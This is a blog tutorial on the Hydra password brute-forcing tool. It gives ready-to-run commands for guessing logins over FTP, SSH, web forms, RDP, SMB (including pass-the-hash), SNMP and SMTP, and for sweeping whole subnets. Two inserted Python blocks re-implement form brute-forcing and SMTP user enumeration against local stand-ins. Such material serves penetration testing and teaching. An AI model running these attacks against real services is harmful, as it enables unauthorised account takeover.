Gaurav Davre
5 min read · Dec 16, 2022

### 003 mastering

What is Hydra?

Very Basic Introduction With ***

Hydra is an online brute-force password-guessing tool: it attacks a live authentication service over the network rather than cracking password hashes offline.

We can use Hydra to run through a word list and brute-force an authentication service. Imagine trying to guess someone's password on a particular service (SSH, a web application login form, FTP or SNMP) by hand; Hydra runs through a password list for us, much faster, and reports the password that worked.

Hydra has the ability to bruteforce the following protocols: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-POST, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTPS-POST, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, RTSP, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Password lists of 100 million or more common passwords are freely available, so when an out-of-the-box application ships with an easy default password, change it! CCTV cameras and web frameworks often ship with admin:password as the default credential, which is obviously not strong enough.

Installing Hydra

If you’re using Kali Linux, hydra is pre-installed. Otherwise you can download it here: https://github.com/vanhauser-thc/thc-hydra

Hydra Commands

The options we pass to Hydra depend on which service (protocol) we're attacking. For example, to brute-force FTP with the username user and the password list passlist.txt, we would run:

hydra -l user -P passlist.txt ftp://MACHINE_IP

SSH

hydra -l <username> -P <full path to pass> MACHINE_IP -t 4 ssh

Here -t 4 limits Hydra to four parallel connections. Many SSH servers throttle or drop connections when more tasks run at once, and Hydra itself warns you to use -t 4 against SSH.

Post Web Form

Hydra can brute-force web forms too, but you have to know what kind of request the form makes; GET and POST are the usual methods. Use your browser's network tab (in developer tools) to see the request, or simply view the page source.

Below is an example Hydra command to brute-force a POST login form. The quoted argument has three colon-separated fields: the path of the form, the request body with ^USER^ and ^PASS^ as placeholders for each guess, and the failure condition (F=string). Any response that does not contain the failure string is reported as a valid login, so pick a string that appears on every failed attempt, otherwise every guess looks like a hit:

hydra -l <username> -P <wordlist> MACHINE_IP http-post-form "/:username=^USER^&password=^PASS^:F=incorrect" -V
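To make the failure-condition logic concrete, here is an added example (mine, not code from the original post or from thc-hydra) that re-implements the core of the http-post-form module in Python and runs it against a throw-away local login form, so it works offline. Everything about the target is an assumption: the form at "/" with fields username and password, the constructed credential admin:letmein, and the constructed word list. The second run uses a failure string that never appears in the response, to show the false-positive failure mode described above.

```python
"""Added example, not from the original post or from thc-hydra: a minimal
re-implementation of hydra's http-post-form logic against a local stand-in
target. Target layout, credentials and word list are all constructed here."""
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

VALID = {"admin": "letmein"}                                     # constructed
WORDLIST = ["123456", "password", "admin", "letmein", "qwerty"]  # constructed


class LoginHandler(BaseHTTPRequestHandler):
    """Constructed stand-in for the target web application."""

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        form = urllib.parse.parse_qs(self.rfile.read(length).decode())
        user = form.get("username", [""])[0]
        password = form.get("password", [""])[0]
        ok = VALID.get(user) == password
        body = b"Welcome back" if ok else b"Login incorrect, try again"
        self.send_response(200)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo output quiet
        pass


def parse_form_spec(spec):
    """Split hydra's "path:body:F=string" argument into its three fields.

    Only the F= (failure string) condition is handled here; hydra also
    accepts S= for a success string, and escaped colons, which are not."""
    path, body, cond = spec.split(":", 2)
    if not cond.startswith("F="):
        raise ValueError("only F= failure conditions are supported here")
    return path, body, cond[2:]


def try_login(base_url, spec, user, password):
    """One attempt: substitute ^USER^/^PASS^, POST, test the failure string."""
    path, body, fail_str = parse_form_spec(spec)
    data = (body.replace("^USER^", urllib.parse.quote(user))
                .replace("^PASS^", urllib.parse.quote(password)))
    req = urllib.request.Request(base_url + path, data=data.encode(),
                                 method="POST")
    # Empty ProxyHandler: never route the loopback request via a proxy.
    opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
    with opener.open(req) as resp:
        page = resp.read().decode()
    return fail_str not in page      # hydra's rule: no failure string == hit


def brute_force(base_url, spec, user, wordlist):
    """Return the first candidate that does not trigger the failure string."""
    for candidate in wordlist:
        if try_login(base_url, spec, user, candidate):
            return candidate
    return None


def start_demo_server():
    """Start the constructed target on an ephemeral loopback port."""
    server = HTTPServer(("127.0.0.1", 0), LoginHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


def run_demo():
    """Returns (hit with a correct F= string, hit with a bogus F= string)."""
    server, base = start_demo_server()
    try:
        good = brute_force(base, "/:username=^USER^&password=^PASS^:F=incorrect",
                           "admin", WORDLIST)
        # "NOPE" never appears in any response, so the very first guess is
        # reported as valid: the classic http-post-form false positive.
        bogus = brute_force(base, "/:username=^USER^&password=^PASS^:F=NOPE",
                            "admin", WORDLIST)
        return good, bogus
    finally:
        server.shutdown()
        server.server_close()


if __name__ == "__main__":
    good, false_positive = run_demo()
    print("correct failure string ->", good)
    print("bogus failure string   ->", false_positive)
```

Run it and the correct failure string yields letmein, while the bogus one "finds" 123456 on the first try. Before a real run, submit one deliberately wrong login in the browser and copy a string from that response into F=, exactly as the command above does with "incorrect".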

Common & Basic Modules

- rdp

Module rdp optionally takes the Windows domain name.

For example:

hydra rdp://192.168.0.1/firstdomainname -l john -p doe

- s7-300

Module s7-300 is for a special Siemens PLC. It either requires only a password or no authentication at all, so just use the -p or -P option.

- smb

By default, module smb tests both local and domain accounts, using a plaintext password with the NTLM dialect.

Note: you can set the group type using the LOCAL or DOMAIN keyword, or other_domain:{value} to specify a trusted domain.

You can set the password type using the HASH keyword (pass an LM:NT hash instead of a password) or the MACHINE keyword (use the machine's NetBIOS name as the password).

You can set the dialect using the NTLMV2, NTLM, LMV2 or LM keyword.

Example:

hydra smb://microsoft.com -l admin -p tooeasy -m "local lmv2"

hydra smb://microsoft.com -l admin -p D5731CFC6C2A069C21FD0D49CAEBC9EA:2126EE7712D37E265FD63F2C84D2B13D::: -m "local hash"

hydra smb://microsoft.com -l admin -p tooeasy -m "other_domain:SECONDDOMAIN"

- smtp, smtps

Module smtp optionally takes one authentication type of: LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, NTLM

Additionally TLS encryption via STARTTLS can be enforced with the TLS option.

Example: smtp://target/TLS:PLAIN

- smtp-enum

Module smtp-enum optionally takes one SMTP command of: VRFY (default), EXPN, RCPT (which connects using the "root" account as sender). The login parameter is used as the username and the password parameter as the domain name.

For example to test if john@localhost exists on 192.168.0.1:

hydra smtp-enum://192.168.0.1/vrfy -l john -p localhost
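What that command does on the wire is a plain SMTP conversation. The following added example (mine, not code from the original post or from thc-hydra) performs the same VRFY probe in Python against a throw-away local SMTP stand-in so it runs offline, mirroring the module's convention that the login is the username and the password is the domain. The stand-in server and its mailbox list KNOWN_USERS are constructed for the demo; it answers VRFY with 250 for known users and 550 otherwise, and refuses EXPN with 502, which is what a hardened real server often does.

```python
"""Added example, not from the original post or from thc-hydra: the VRFY/EXPN
probe behind hydra's smtp-enum, against a constructed local SMTP stand-in."""
import socket
import threading

KNOWN_USERS = {"john", "postmaster"}  # constructed mailbox list for the demo


def _serve_one(conn):
    """Constructed SMTP stand-in: handles one client session, then exits."""
    rfile = conn.makefile("rb")
    conn.sendall(b"220 mail.example.test ESMTP\r\n")
    for raw in rfile:
        verb, _, arg = raw.decode(errors="replace").strip().partition(" ")
        verb = verb.upper()
        if verb == "VRFY":
            local = arg.strip("<>").split("@", 1)[0]
            reply = (b"250 " + local.encode() + b"\r\n" if local in KNOWN_USERS
                     else b"550 5.1.1 User unknown\r\n")
        elif verb == "EXPN":
            reply = b"502 5.5.1 EXPN not implemented\r\n"
        elif verb == "QUIT":
            conn.sendall(b"221 Bye\r\n")
            break
        else:
            reply = b"500 Unrecognised command\r\n"
        conn.sendall(reply)
    conn.close()


def start_demo_server():
    """Listen on an ephemeral loopback port; returns the listening socket."""
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)

    def accept_loop():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:          # listening socket closed: stop serving
                return
            threading.Thread(target=_serve_one, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return srv


def smtp_enum(host, port, users, domain, command="VRFY"):
    """Probe each user@domain with one SMTP command, like smtp-enum does.

    Returns (existing, unknown, error): 250 means the mailbox exists, 550
    means it does not, anything else (502, 252, 500 ...) means the server
    will not answer this probe, so we stop and report that code."""
    existing, unknown = [], []
    with socket.create_connection((host, port), timeout=5) as s:
        rfile = s.makefile("rb")
        rfile.readline()                                   # 220 banner
        for user in users:
            s.sendall(f"{command} {user}@{domain}\r\n".encode())
            code = rfile.readline()[:3]
            if code == b"250":
                existing.append(user)
            elif code == b"550":
                unknown.append(user)
            else:
                s.sendall(b"QUIT\r\n")
                return existing, unknown, code.decode()
        s.sendall(b"QUIT\r\n")
    return existing, unknown, None


if __name__ == "__main__":
    srv = start_demo_server()
    host, port = srv.getsockname()
    print(smtp_enum(host, port, ["john", "alice", "postmaster"], "localhost"))
    print(smtp_enum(host, port, ["john"], "localhost", command="EXPN"))
    srv.close()
```

The 502 branch is the caveat worth remembering: many mail servers disable VRFY and EXPN or answer 252 for everything, in which case smtp-enum's default mode tells you nothing and the RCPT mode (or a different technique) is needed.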

- snmp

Module snmp optionally takes the following parameters:

  READ perform read requests (default)
  WRITE perform write requests
  1 use SNMP version 1 (default)
  2 use SNMP version 2
  3 use SNMP version 3

Note that SNMP version 3 usually uses both login and passwords!

SNMP version 3 has the following optional sub parameters:

  MD5 use MD5 authentication (default)
  SHA use SHA authentication
  DES use DES encryption
  AES use AES encryption

If no -p/-P parameter is given, SNMPv3 noauth is performed, which only requires a password (or username), not both.

To combine the options, use colons (“:”), e.g.:

hydra -L user.txt -P pass.txt -m 3:SHA:AES:READ target.com snmp

hydra -P pass.txt -m 2 target.com snmp

- sshkey

Module sshkey does not provide additional options, although the semantics of options -p and -P are changed:

  • -p expects a path to an unencrypted private key in PEM format.
  • -P expects a filename containing a list of paths to unencrypted private keys in PEM format.

- svn

Module svn optionally takes the repository name to attack; the default is "trunk".

- telnet, telnets

Module telnet optionally takes the string that is displayed after a successful login (case insensitive); use it if the default in the telnet module produces too many false positives.

- xmpp

Module xmpp optionally takes one authentication type of: LOGIN (default), PLAIN, CRAM-MD5, DIGEST-MD5, SCRAM-SHA1

Note: the target passed should be an FQDN, as the value is used in the Jabber init request, e.g. hermes.jabber.org

Hydra Usage

Attempt to login as the user (-l user) using a password list (-P passlist.txt) on the given FTP server (ftp://192.168.0.1):

hydra -l user -P passlist.txt ftp://192.168.0.1

Attempt to login on the given SSH servers (ssh) from the list (-M targets.txt) using a user list (-L logins.txt) and password list (-P pws.txt):

hydra -L logins.txt -P pws.txt -M targets.txt ssh

Attempt to login on the given FTP servers on the given subnet (ftp://[192.168.0.0/24]/) as the user admin (-l admin) and the password password (-p password):

hydra -l admin -p password ftp://[192.168.0.0/24]/

Attempt to login on the given mail server (imap://192.168.0.1/), using IMAP protocol with a user list (-L userlist.txt) and the password defaultpw (-p defaultpw), taking the authentication type PLAIN:

hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN

Attempt to login on the given mail server using POP3S on the given IPv6 (-6) address 2001:db8::1, on port 143 using the credential list “login:password” from the defaults.txt file (-C defaults.txt) taking the authentication type DIGEST-MD5 and enforced TLS encryption via STLS (TLS).

hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
